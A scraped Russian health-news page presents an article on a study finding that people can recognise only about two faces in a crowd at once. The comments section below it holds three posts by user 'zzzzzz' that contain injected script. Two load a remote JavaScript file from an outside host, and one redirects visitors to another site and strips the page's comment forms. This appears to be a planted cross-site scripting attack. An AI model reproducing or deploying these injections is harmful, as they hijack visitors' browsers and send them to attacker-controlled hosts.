Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как первым увидеть в толп...  >>  Как первым увидеть в толпе звезду? У нас есть научный ответ!
 
Обратная связь
 

Как первым увидеть в толпе звезду? У нас есть научный ответ!

Размер шрифта
19 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые утверждают, что наши возможности по распознаванию лиц в толпе ограничены, причем не имеет особого значения, идет ли речь о незнакомцах или же об известных людях, лица которых нам давно и хорошо знакомы.

Как первым увидеть в толпе звезду? У нас есть научный ответ!

За один раз человек может распознать в толпе лишь два лица, считают ученые. Исследование этого вопроса провел Волкер Тома из Университета Восточного Лондона, и совсем недавно оно было опубликовано в журнале Psychonomic Bulletin & Review. Полученные результаты могут быть применены как в нейропсихологической реабилитации, так и при анализе показаний очевидцев в процессе расследования.

Тома провел два эксперимента, участникам которых было предложено определить лица известных политиков, таких как Тони Блэр и Билл Клинтон, а также популярных исполнителей – Мика Джаггера и Робби Уильямса, среди большого числа лиц незнакомцев. В обоих случаях было также использовано «отвлекающее лицо» – портрет, помещенный сбоку от экрана, причем всех участников попросили игнорировать его во время исследования.

В первом эксперименте портрет знаменитости был показан в центре экрана, сам по себе или же в окружении нескольких фотографий незнакомцев. Все участники довольно быстро реагировали на появление фотографии знаменитости. Однако, несмотря на просьбу игнорировать фотографию, использованную в качестве отвлекающей, ее присутствие все равно оказывало влияние на способность распознавать лица известных людей. Как оказалось, игнорировать портрет незнакомца всем участникам было довольно непросто. Когда же в центре экрана было показано сразу много фотографий (среди которых найти, к примеру, Мика Джаггера, было уже куда сложней), участники более не отвлекались на лицо сбоку. По мнению Тома, это говорит о том, что люди могут распознавать лишь ограниченное количество лиц за определенный период времени.

Аналогичные результаты были получены и во втором эксперименте, когда фотографии незнакомцев были перевернуты вверх ногами. Ранее считалось, что перевернутые лица гораздо менее узнаваемы, и именно поэтому их легче игнорировать. Существовало даже мнение, что они воспринимаются не как лица людей, а скорее как предметы. Таким образом, лицо известного певца или политика должно было выделяться на их фоне еще в большей мере, однако этого не произошло. «Люди распознают лица автоматически, однако это перестает работать тогда, когда лиц становится слишком много. Узнавание ограничено количеством фрагментов и частей лица (губ, глаз, ушей и так далее), причем это работает даже в том случае, если фотографии перевернуты вниз головой», – объясняет Тома.

Так что будьте готовы к тому, что даже если вы встретите любимого актера, лицо которого видели тысячи раз, вам понадобится время, чтобы узнать его в толпе.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему вы зеваете? Чтобы остудить мозги!   Арахис и линейка предскажут ваше будущее   Ваша печень сжирает ваш мозг   Горячий шоколад защищает мозг  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Просто забывчивость или болезнь? 5 вопросов о памяти
Как сохранить мозги в 30 лет
Игры, которые сделают вас гением!

Тесты

1
Будет ли у вас инфаркт?
Возраст мозга
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.